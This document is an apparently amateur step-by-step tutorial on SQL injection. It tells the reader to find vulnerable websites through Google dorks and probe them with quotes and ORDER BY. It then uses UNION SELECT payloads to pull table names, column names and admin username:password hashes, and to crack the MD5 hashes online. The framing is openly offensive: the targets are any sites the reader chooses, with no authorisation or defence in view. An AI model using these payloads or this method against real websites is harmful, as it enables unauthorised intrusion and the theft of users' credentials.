SQL Injection -Fully Explained

1. Welcome, here you'll find out how to SQL Inject, by steps.
2. _________________________________________________________________________
3. Find Dorks here: http://pastebin.com/4kDM5MbJ
4.  
5. 1) Find the site you want to SQL Inject from google.com
6.  
7. 2) Search your dorks (From the list provided) on google.
8.  
9. 3) Select sites and put a ' at the end of the number of the url.
10.  
11. 4) If you get a error(any type with MYSQL error included) or A broken Images (or video) Its Vulnerable
12.  
13. 5) Now you need to do ORDER BY 100- if it says "column 100 Unknown" Or the same error go down to 25 and go down 1 each time till it has no error. Now you found your Vulnerable table Lets Inject it!
14.  
15. 6) Okay now once you have the table that is injectable, Lets Say your vuln column is 5 and you recieve the error on "6" do UNION SELECT (Example: site.com/index.php?id=null union select 1,2,3,4,5--) Lets say it gives you 3 numbers, 1 & 3. Both are injectable!
16.  
17. 7) Now lets check the Version of the Website. (EXAMPLE: site.com/index.php?id=null union select 1,2,@@version,4,5,6--) This will give you the version of the site!
18. ______________________________________________
19. Alright Now that we found the version (This isn't important, not exactly anyway) You're ready to find the tables,columns,and data from the database! Lets begin.
20. ---------------------------------------------------------
21.  
22. 8) Now we need to find the tables, you simply do this (Example: site.com/index.php?id=null union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()-- ) This will get the tables of the site!
23.  
24. Note: keep notepad++ or notepad open to keep track of columns and tables
25. (look for username,password,email)
26. ----------------------------------------------------------
27. Now we need to find the columns of the website, this is fairly easy to do!
28.  
29. 9) Simply do this: (EXAMPLE: site.com/index.php?id=null union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_schema=database()-- )
30.  
31. After you did this CONGRATULATIONS you've found the tables and columns of the website!
32. ----------------------------|---------|--------------------------------------------------------
33. ----------------------------|STEP 10 |--------------------------------------------------------
34. ----------------------------|---------|--------------------------------------------------------
35. Now it is time to find your administrative information!
36. Do these steps below! Lets say you found Username and Password in your tables, and you found login in your column section!
37.  
38. To find your admin info do this: (EXAMPLE: site.com/index.php?id=null union select 1,2,group_concat(username,0x3a,password),4,5,6 from login-- ) You'll recieve the information of all the users in the database, from the login recent,old,etc.
39.  
40. Lets say it is Like this on the preview page!
41.  
42. admin:b59c67bf196a4758191e42f76670ceba
43.  
44. You now see a hash up top next to : <--that.
45. To decrypt a hash (This is a MD5 hash) You can simply go to http://www.md5decrypter.co.uk and decrypt it. (This is usually in plain text though)
46.  
47. Here is a photo of the example:
48.  
49. http://prntscr.com/y4mag
50.  
51. Enjoy I hope this helped with your SQL Injection